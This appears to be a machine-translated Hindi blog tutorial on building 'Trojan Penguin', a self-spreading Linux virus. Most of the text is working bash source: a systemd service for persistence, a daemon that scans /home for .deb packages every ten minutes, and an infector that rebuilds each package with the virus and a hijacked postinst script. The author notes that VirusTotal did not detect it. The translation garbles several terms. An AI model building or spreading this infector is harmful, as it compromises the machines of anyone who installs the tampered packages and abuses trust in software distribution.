ट्रोजन पेंगुइन: लिनक्स के लिए एक वायरस बनाना

नहीं, मैं यह नहीं बताने जा रहा हूं कि मेरे रैंसमवेयर रैनसमवेयर, माइनर को कैसे लिखें या सुपर-नई भेद्यता का फायदा उठाएं, जैसा कि आप सोच सकते हैं। और इससे भी अधिक, मैं होलिवर को बढ़ाने के लिए उत्सुक नहीं हूं "क्या लिनक्स विंडोज से अधिक सुरक्षित है? (हां)"। मेरा लक्ष्य लाइनक्स के लिए एक सरल वायरस लिखना था, कोई भी, इसलिए "जस्ट फन" बोलना, जिसका एकमात्र कार्य इसकी कॉपी वितरित करना है। मैंने क्या किया, इस लेख में बताऊंगा। अंत में, मैं स्रोत के साथ GitHub का लिंक दूंगा।

त्याग

यह लेख शैक्षिक उद्देश्यों के लिए लिखा गया है। किसी भी स्थिति में लेखक पाठकों को रूसी संघ के कानूनों का उल्लंघन करने के लिए प्रोत्साहित नहीं करता है। कृपया रूसी संघ के आपराधिक संहिता के पहले अध्याय 28 को पढ़े बिना इस लेख में वर्णित चरणों को न दोहराएं।

और हम वास्तव में क्या करेंगे?

वायरस को फैलाने के लिए सबसे आसान कार्यान्वयन तंत्र मुझे संशोधित डिबेट / आरपीएम पैकेज के माध्यम से फैलता हुआ लग रहा था। डिब और आरपीएम पैकेज अब लिनक्स के लिए सबसे लोकप्रिय वितरण उपकरण हैं। मैंने डिबेट का विकल्प चुना, क्योंकि डेबियन-आधारित वितरण के उपयोगकर्ताओं की संख्या Red Hat और इसके "फ़ॉलोअर्स" के उपयोगकर्ताओं पर है।

यह भी आवश्यक है कि वायरस स्वचालित रूप से शुरू हो, और हर निश्चित अवधि के बाद कंप्यूटर को डिबेट पैकेज की तलाश में स्कैन करता है। डिबगिंग में आसानी के लिए, मैंने 10 मिनट की अवधि चुनी।

डिबेट पैकेज क्या है?

डीब पैकेज एक .ar प्रारूप संग्रह है जो संपीड़न का उपयोग नहीं करता है। संग्रह के अंदर तीन और फाइलें हैं: डेबियन-बायनरी , कंट्रोल.टार और डेटा। टार

debian.binary - एक पाठ फ़ाइल जिसमें डेब पैकेज प्रारूप का एक संस्करण है, इस समय वे हमेशा "2.0" लिखते हैं।

control.tar - पैकेज के बारे में जानकारी वाली फ़ाइलों के साथ संग्रह (उदाहरण के लिए, आवश्यक नियंत्रण फ़ाइल) और पैकेज स्थापित करने के लिए आवश्यक पैकेज (उदाहरण के लिए, पैकेज को स्थापित / अनइंस्टॉल करने से पहले / उसके बाद चलने वाली स्क्रिप्ट, उदाहरण के लिए, पोस्टस्ट्रीम, प्रर्म और पोस्टम स्क्रिप्ट)। इसे gzip या xz का उपयोग करके संपीड़ित किया जा सकता है, जिस स्थिति में क्रमशः .gz या .xz को संग्रह नाम में जोड़ा जाता है।

data.tar - संग्रहित फ़ाइलों वाली निर्देशिकाओं के साथ संग्रह। निर्देशिकाओं को एक पेड़ द्वारा दर्शाया जाता है, जिसके रूप में उन्हें फ़ाइल सिस्टम के मूल में निकाला जाना चाहिए। Gzip, bzip2, lzma, xz का उपयोग करके संपीड़ित किया जा सकता है।

हमें control.tar आर्काइव से कंट्रोल फाइल पर ध्यान देने की जरूरत है। इस फ़ाइल में पैकेज के बारे में जानकारी है, जैसे कि लेखक, विवरण, संस्करण, सिस्टम में पैकेज प्राथमिकता, आदि। मैं निर्भर क्षेत्र में रुचि रखता हूं, जो निर्भरता दिखाता है (पैकेज जिसके बिना यह इस पैकेज से काम नहीं कर सकता है)। इस क्षेत्र में, हमारा वायरस fakeroot और dpkg - उपयोगिताओं को जोड़ देगा जो कि संक्रमित कंप्यूटर पर अन्य पैकेजों को संशोधित करते समय आवश्यक होंगे।

एक डिबेट पैकेज बनाने के लिए, पैकेज की रूट डायरेक्टरी बनाई जाती है। इंस्टॉल की गई फ़ाइलों और DEBIAN निर्देशिका के साथ डायरेक्ट्री फाइलें, जिसमें नियंत्रण / स्थापना के लिए स्क्रिप्ट और नियंत्रण / स्थापना सहित स्क्रिप्ट शामिल हैं, को इसमें रखा गया है। फिर fakeroot dpkg-deb --build ./path कमांड निष्पादित किया जाता है ।

पहले एक दानव था

वायरस लिखने के समय, मुझे अभी भी एक बुरा विचार था कि क्रोन क्या था , और इसलिए मैं सिस्टमडाउन के साथ अपना डेमॉन लिखकर चला गया। मैंने ट्रोजन_पेंज़िन.सेवे फ़ाइल बनाई, जिसे / lib / systemd / system निर्देशिका में रखा जाएगा, और इसमें निम्नलिखित जोड़ दिए जाएंगे:

[Unit] Description = XXX [Service] ExecStart=/usr/bin/trojan_penguin.sh Type=fork [Install] WantedBy=multi-user.target 

ExecStart = / usr / bin / trojan_penguin.sh - यहां मैंने फ़ाइल (भविष्य के वायरस के लिए) का पथ इंगित किया, जिसे सिस्टम स्टार्टअप पर लॉन्च किया जाना चाहिए।

प्रकार = कांटा - यह रेखा इंगित करती है कि प्रक्रिया को मूल प्रक्रिया से शाखा चाहिए।
मुझे पीआईडी ​​फ़ाइल की आवश्यकता नहीं दिखी, इसलिए मैंने इसे नहीं जोड़ा।

अपने स्वयं के डेमॉन लिखने के लिए नियमावली में .service फ़ाइलों को निर्देशिकाओं / usr / lib / systemd / system / या / etc / systemd / system / में रखा जाना प्रस्तावित है। लेकिन मेरी ubunt में मुझे निर्देशिका / lib / systemd / system मिला। (मुझे वहाँ apache2.service मिला)। हो सकता है कि टिप्पणियों में कोई व्यक्ति यह लिखेगा कि यह निर्देशिका किस लिए है, और यह अन्य दो से कैसे भिन्न है।

फ़ाइल /usr/bin/trojan_penguin.sh मुझे यह मिली:

 #!/bin/bash #debug=".../Programming/projects/TrojanPenguin" debug="" #    ,    if ! [ -d $debug/var/log/trojan_penguin/ ]; then mkdir $debug/var/log/trojan_penguin fi #   , #   10  while [ 1 ] do list=$(find /home -name "*.deb") # deb- #        for line in $list do $debug/usr/bin/tp_infect.sh $line >> $debug/var/log/trojan_penguin/log # ,  ,      log done date > $debug/var/log/trojan_penguin/last_start #     (     ) sleep 600 # (60 * 10  = 10 ) done 

हम / होम सेक्शन में डिबेट पैकेज की तलाश कर रहे हैं (जहां मैं उन्हें ढूंढ सकता हूं?), पाया फ़ाइलों के पथ सूची चर में लिखे गए हैं। फिर बस लाइन से सभी लाइनों पर पुनरावृत्त करें और प्रत्येक फ़ाइल के लिए हम tp_infect.sh स्क्रिप्ट चलाते हैं, जो इस फ़ाइल को संक्रमित करेगा। जब मैंने वायरस लिखा था, तो स्क्रिप्ट एक अलग निर्देशिका में थीं, और सुविधा के लिए मैंने एक डीबग चर बनाया, जिसमें मैंने इस फ़ोल्डर का पथ लिखा।

डेमन तैयार है, यह सीखना है कि सिस्टम शुरू होने पर इसे कैसे चलाना है। इसके लिए, मैंने एक बाद की स्क्रिप्ट लिखी। यह संक्रमित पैकेज को स्थापित करने के तुरंत बाद शुरू होगा और संकेत देगा कि हमारा वायरस सिस्टम से शुरू होता है। मैंने इसे "" / usr / bin / "निर्देशिका में रखा ताकि इसे संक्रमित पैकेज में कॉपी किया जा सके।

 #!/bin/bash #debug="/home/dima/Dropbox/Programming/projects/TrojanPenguin/TrojanPenguin" debug="" systemctl daemon-reload #  ,           systemctl enable trojan_penguin.service #     systemctl start trojan_penguin.service #  

डिबेट पैकेज को संशोधित करना

जैसा कि मैंने ऊपर लिखा था, एक डेब पैकेज में शामिल अभिलेखों में अलग-अलग अनुमतियां हो सकती हैं। मैंने परेशान नहीं किया, और केवल मामले पर विचार किया जब अभिलेखागार .xz का उपयोग कर संकुचित होते हैं। /Usr/bin/tp_infect.sh फ़ाइल के संशोधन के लिए जिम्मेदार निम्नलिखित सामग्री प्राप्त की:

 #!/bin/bash #debug=".../Programming/projects/TrojanPenguin" debug="" temp="$debug/tmp/trojan_penguin" #   mkdir $temp mkdir $temp/new mkdir $temp/new/DEBIAN #  ar -p $1 data.tar.xz | tar -xJ -C $temp/new ar -p $1 control.tar.xz | tar -xJ -C $temp/new/DEBIAN/ # control #  control     "Deepends",    "Deepends",   ,     . cp $temp/new/DEBIAN/control $temp/orig_control cat $temp/orig_control | grep --before-context=100 Depends | grep -v Depends > $temp/new/DEBIAN/control cat $temp/orig_control | grep Depends | tr -d '\r\n' >> $temp/new/DEBIAN/control echo ", fakeroot, python" >> $temp/new/DEBIAN/control cat $temp/orig_control | grep --after-context=100 Depends | grep -v Depends >> $temp/new/DEBIAN/control #    cp $debug/usr/bin/tp_postinst.sh $temp/new/DEBIAN/postinst #     ,    if ! [ -d $temp/new/usr ]; then mkdir $temp/new/usr fi if ! [ -d $temp/new/usr/bin ]; then mkdir $temp/new/usr/bin fi if ! [ -d $temp/new/lib ]; then mkdir $temp/new/lib fi if ! [ -d $temp/new/lib/systemd ]; then mkdir $temp/new/lib/systemd fi if ! [ -d $temp/new/lib/systemd/system ]; then mkdir $temp/new/lib/systemd/system fi #   cp $debug/usr/bin/trojan_penguin.sh $temp/new/usr/bin/trojan_penguin.sh cp $debug/usr/bin/tp_infect.sh $temp/new/usr/bin/tp_infect.sh cp $debug/usr/bin/tp_postinst.sh $temp/new/usr/bin/tp_postinst.sh cp $debug/lib/systemd/system/trojan_penguin.service $temp/new/lib/systemd/system/ # ,        ,    . fakeroot dpkg-deb --build $temp/new cp $temp/new.deb $1 rm -R $temp 

स्थापना के बाद की समस्याएं

सबकुछ ठीक होगा, लेकिन अब हमें एक समस्या है। लेकिन क्या होगा अगर पैकेज में पहले से ही पोस्टस्टैनल है? मूल postinstal को विभिन्न भाषाओं (अजगर, बाश ...) में लिखा जा सकता है, शायद यह एक द्विआधारी भी है। यह हमें केवल इसके बाद की स्थापना रद्द करने और जोड़ने की अनुमति नहीं देगा। मैंने इस समस्या को इस प्रकार हल किया:

निम्नलिखित चीज़ को tp_infect.sh स्क्रिप्ट में जोड़ा गया:

 #,     postinstal.  ,      . if [ -f $temp/new/usr/bin/postinst ]; then cp $temp/new/DEBIAN/postinst $debug/usr/bin/tp_orig_postinst fi 

और पोस्टस्टीनल में , यह है:

 #      if [ -f $debug/usr/bin/tp_orig_postinst ]; then $debug/usr/bin/tp_orig_postinst rm $debug/usr/bin/tp_orig_postinst fi 

मैंने एक समस्या हल की, लेकिन दूसरी दिखाई दी। हमारा वायरस पैकेज को संशोधित करेगा, भले ही यह पहले से संक्रमित हो। संशोधन करने पर, वायरस यह देखेगा कि पैकेज में एक पोस्टिंस्टल है (जो वास्तव में हमारा है), इसे / usr / bin / पर ले जाएं, जिससे मूल ओवरराइट हो जाए। इससे बचने के लिए, मैंने "tp_infect.sh" में एक चेक जोड़ा, कि क्या हमने इस फाइल को संशोधित किया है या नहीं:

 if [ -f $temp/new/usr/bin/trojan_penguin.sh ]; then rm -R $temp exit 0 fi 

इसे एक साथ रखना

वायरस तैयार है। यहाँ GitHub की एक कड़ी है , जैसा कि वादा किया गया है। इस वायरस को रिपॉजिटरी से एक अलग डिबेट पैकेज (रन makedeb.sh) में संकलित किया जा सकता है। वायरस को किसी भी पैकेज में इंजेक्ट करने के लिए, बस कमांड चलाएँ:

 tp_infect.sh /  deb-/ 

रिपॉजिटरी में पोस्टस्टोन स्क्रिप्ट की दो प्रतियां हैं

DEBIAN / पोस्टस्टीन - यह प्रतिलिपि केवल एक वायरस के साथ एक खाली पैकेज स्थापित करते समय की जाती है। मैंने इसे टिप्पणी की ताकि वायरस स्थापना के बाद शुरू न हो, और केवल कमांड द्वारा संकुल को संशोधित करता है।

usr / bin / postinst - इस प्रति को संक्रमित पैकेज में डाला जाता है।

परिणाम

और इस लेख के बिना निष्कर्ष स्पष्ट है: आपको असत्यापित स्रोतों से प्रोग्राम डाउनलोड और चलाना नहीं चाहिए।

जिज्ञासा के लिए, मैंने विश्लेषण के लिए VirusTotal को वायरस डिब पैकेज भेजा। लेखन के समय, एक भी एंटीवायरस ने इसका पता नहीं लगाया। यहाँ रिपोर्ट के लिए लिंक है। मुझे आश्चर्य है कि कितना समय गुजरना चाहिए, और कितने मेजबान को इस वायरस से संक्रमित होने की आवश्यकता है ताकि एंटीवायरस इस पर ध्यान दें?